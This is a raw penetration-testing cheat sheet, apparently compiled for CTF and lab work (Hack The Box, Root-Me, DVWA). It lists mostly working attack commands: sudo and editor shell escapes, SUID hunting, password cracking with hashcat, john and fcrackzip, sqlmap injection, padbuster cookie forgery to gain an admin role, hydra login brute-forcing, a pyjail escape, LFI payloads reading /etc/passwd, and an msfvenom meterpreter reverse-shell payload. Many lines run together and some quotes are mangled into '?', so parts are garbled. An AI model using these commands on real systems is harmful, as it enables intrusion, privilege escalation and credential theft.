apt install kali-linux-all
git clone https://github.com/internetwache/GitTools.git
nmap -sC -sV -oA initial 10.10.10.78nmap -sV -sC -oA nmap-tcp 10.10.10.84nmap -T4 -A -v -p 0-10000 10.10.10.8
python -m SimpleHTTPServer 80
/tmp/dev/shm
sudo -u zip /path-zip-file /path-to-output -T --unzip-command="sh -c /bin/bash"vim -> :set shell=/bin/bash -> :shell (ENTER) -> export PATH=/usr/bin:/binsudo -u app-script-ch14-2 /usr/bin/python -c "import os; os.system('/bin/bash')"sudo -u app-script-ch14-3 tar cf /dev/null somefile --checkpoint=1 --checkpoint-action=exec=/bin/bashsudo -u app-script-ch14-4 zip /tmp/bla.zip /tmp/bl -T --unzip-command="sh -c /bin/bash"sudo -u app-script-ch14-5 awk 'BEGIN{system("bash")}'sudo -u app-script-ch14-6 gdb -q-> (gdb)!/bin/bashsudo -u app-script-ch14-7 pico -s "/bin/bash"# write/bin/bashand press CTRL-Tsudo -u app-script-ch14-8 /usr/bin/scp -S "/tmp/dsds.sh" x:y ./# [1]sudo -u app-script-ch14-9 man man# write !/bin/bash and press ENTERsudo -u app-script-ch14-10 ssh -o ProxyCommand="sh -c /tmp/sdsd.sh" 127.0.0.1# [1]sudo -u app-script-ch14-11 git help status# write!/bin/bashand press ENTERsudo -u app-script-ch14-12 rvim# write:python import os; os.system("/bin/asas.sh")and press ENTER [1]sudo -u app-script-ch14-13 script script.sh[1]sudo -u app-script-ch14-14 rbash-- # [2]app-script-ch14-14@challenge02:~/step14$ mapfile ARRAY < ../.passwd ARRAYapp-script-ch14-14@challenge02:~/step14$ echo $ARRAY
python -c 'import pty; pty.spawn("/bin/sh")'python -c 'import pty; pty.spawn("/bin/bash")'
When an pythong script is asking for input try to execute code
-
__import__("os").execl("/bin/sh","sh") -
__import__("os").execl("/bin/bash","bash") -
python: exit_code = os.system('/bin/sh') output = os.popen('/bin/sh').read() -
perl -e 'exec "/bin/sh";' -
perl: exec "/bin/sh"; -
ruby: exec "/bin/sh" -
lua: os.execute('/bin/sh') -
irb(main:001:0> exec "/bin/sh" -
find /etc -exec sh -i \;
find / -perm -u=s -type f 2> /dev/nullthen execute one of them and try to spawn a shell using:!sh\! /bin/shc-T --unzip-command="sh -c /bin/bash"https://payatu.com/guide-linux-privilege-escalation/
nmap --interactive!sh
One of the most well documented techniques is to spawn a shell from within an editor such as 'vi' or 'vim'. Open any file using one of these editors and type the following and execute it from within the editor:
:set shell=/bin/bash
Next, type and execute:
:shell
Another method is to type:
-
:! /bin/bash -
awk 'BEGIN {system("/bin/sh")}' -
find / -name blahblah -exec /bin/awk 'BEGIN {system("/bin/sh")}' \;
eval $(echo "no:global default;fi:normal file;di:directory;ln:symbolic link;pi:named pipe;so:socket;do:door;bd:block device;cd:character device;or:orphan symlink;mi:missing file;su:set uid;sg:set gid;tw:sticky other writable;ow:other writable;st:sticky;ex:executable;"|sed -e 's/:/="/g; s/\;/"\n/g') { IFS=: ; for i in $LS_COLORS ; do echo -e "\e[${i#*=}m$( x=${i%=*}; [ "${!x}" ] && echo "${!x}" || echo "$x" )\e[m" ; done ; }
hashcat -m 0 /root/Documents/blackmarket/hashes.txt /usr/share/wordlists/rockyou.txt --force -a 0
sqlmap -u http://192.168.1.136/vworkshop/sparepartsstoremore.php?sparepartid=1 --dump-all' or 'a' = 'a' --
openssl enc -d -aes-128-cbc -in salary_dec2003.csv.enc -out salary_dec2003.csv -k tarot
dirb http://88.198.233.174:49505/ '/usr/share/wordlists/dirb/common.txt' -wdirb http://88.198.233.174:49505/ '/usr/share/wordlists/dirb/common.txt' -w -x '/usr/share/wordlists/dirb/extensions_common.txt'
john linuxUsers.txt --showjohn linuxUsers.txt --wordlist=/usr/share/wordlists/rockyou.txt
cewl -m 3 -d 1 -w /root/Desktop/list.txt http://bourne.wikia.com/wiki/Operation_Treadstone
fcrackzip -u -v -D -p /usr/share/wordlists/rockyou.txt fsociety.zipfcrackzip -b -c a -l 5-5 weak-rsa.zipfcrackzip -b -v -u /tmp/mozilla_root0/MarshalInTheMiddle.zipfcrackzip -b -c a -u /tmp/mozilla_root0/0ld_is_g0ld.zip
Try to find the cipher and intermediate bytes
padbuster http://88.198.233.174:49475/profile.php "MZDsOTEkqysmIl10ApMfqmr2f%2BfXxlYZBm7wKIft4VXoLVB9RzFf26Fw2bkBM3F7tXH2d9rrV%2B8%3D" 8 --cookies "iknowmag1k=MZDsOTEkqysmIl10ApMfqmr2f%2BfXxlYZBm7wKIft4VXoLVB9RzFf26Fw2bkBM3F7tXH2d9rrV%2B8%3D" -encoding 0
When its found encrypted the new message that we want
padbuster http://88.198.233.174:49475/profile.php "MZDsOTEkqysmIl10ApMfqmr2f%2BfXxlYZBm7wKIft4VXoLVB9RzFf26Fw2bkBM3F7tXH2d9rrV%2B8%3D" 8 --cookies "iknowmag1k=MZDsOTEkqysmIl10ApMfqmr2f%2BfXxlYZBm7wKIft4VXoLVB9RzFf26Fw2bkBM3F7tXH2d9rrV%2B8%3D" -encoding 0 -cyphertext b571f677daeb57ef - intermediary b160c9a91123616b -plaintext '{"user":"boeiend","role":"admin"}'
-
hydra -P /usr/share/wordlists/rockyou.txt -s 49505 88.198.233.174 http-post-form "/:username=^USER^&password=^PASS^:S=Location\" -L '/root/Documents/SecLists/Usernames/top-usernames-shortlist.txt' -
hydra -P /usr/share/wordlists/rockyou.txt -s 49490 88.198.233.174 http-post-form "/:password=^PASS^:Invalid" -l admin -
CSRF=$(curl -s -c dvwa.cookie "192.168.1.44/DVWA/login.php" | awk -F 'value=' '/user_token/ {print $2}' | cut -d "'" -f2) SESSIONID=$(grep PHPSESSID dvwa.cookie | awk -F ' ' '{print $7}') -
hydra -L /usr/share/seclists/Usernames/top_shortlist.txt -P /usr/share/seclists/Passwords/500-worst-passwords.txt \ -e ns -F -u -t 1 -w 10 -V 192.168.1.44 http-post-form \ "/DVWA/login.php:username=^USER^&password=^PASS^&user_token=${CSRF}&Login=Login:S=Location\: index.php:H=Cookie: security=impossible; PHPSESSID=${SESSIONID}" -
patator http_fuzz method=POST follow=0 accept_cookie=0 --threads=1 timeout=10 \ url="http://192.168.1.44/DVWA/login.php" \ 1=/usr/share/seclists/Usernames/top_shortlist.txt 0=/usr/share/seclists/Passwords/500-worst-passwords.txt \ body="username=FILE1&password=FILE0&user_token=${CSRF}&Login=Login" \ header="Cookie: security=impossible; PHPSESSID=${SESSIONID}" \ -x quit:fgrep=index.php
https://tkxb.wordpress.com/2018/01/30/root-mepython-pyjail-2-write-up/
getattr(getattr(getattr(getout,list(dir(getout))[29]),list(dir(getattr(getout,list(dir(getout))[29])))[10])(repr(getattr(getout,list(dir(getout))[29]))[721:723]),repr(getattr(getout,list(dir(getout))[29]))[122]+repr(getattr(getout,list(dir(getout))[29]))[207]+repr(getattr(getout,list(dir(getout))[29]))[122]+repr(getattr(getout,list(dir(getout))[29]))[7]+repr(getattr(getout,list(dir(getout))[29]))[2]+repr(getattr(getout,list(dir(getout))[29]))[52])(repr(getattr(getout,list(dir(getout))[29]))[57]+repr(getattr(getout,list(dir(getout))[29]))[30]+repr(getattr(getout,list(dir(getout))[29]))[122]+repr(getattr(getout,list(dir(getout))[29]))[69])
Me@RootMe2018
- vi or vim
:set shell=/bin/bashshellOR:! /bin/bash
awk ?BEGIN {system("/bin/sh")}'
find / -name blahblah ?exec /bin/awk ?BEGIN {system("/bin/sh")}' \;
?! /bin/sh'?!/bin/sh?!bash'
echo "evil script code" | tee script.sh
python: exit_code = os.system(?/bin/sh') output = os.popen(?/bin/sh').read()perl ?e ?exec "/bin/sh";'perl: exec "/bin/sh";ruby: exec "/bin/sh"lua: os.execute(?/bin/sh')irb(main:001:0> exec "/bin/sh"
index.php?page=php://filter/convert.base64-encode/resource=config.php%00index.php?page=../../etc/passwd%00
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.98 LPORT=4565
find /home -type f -printf "%f\t%p\t%u\t%g\t%m\n" 2>/dev/null | column -tfind / -writable -type f 2>/dev/null
RsaCtfTool.py --publickey key.pub --private --verbose
for c incat hype_key; do printf "\x$c"; done;
wfuzz -c -z file,/root/Documents/SecLists/Discovery/Web-Content/burp-parameter-names.txt --hh=19 -u http://10.10.10.69/sync\?FUZZ\=yesterdaywfuzz -c -z file,/root/Documents/SecLists/Fuzzing/special-chars.txt -u http://10.10.10.69/sync\?opt\=FUZZ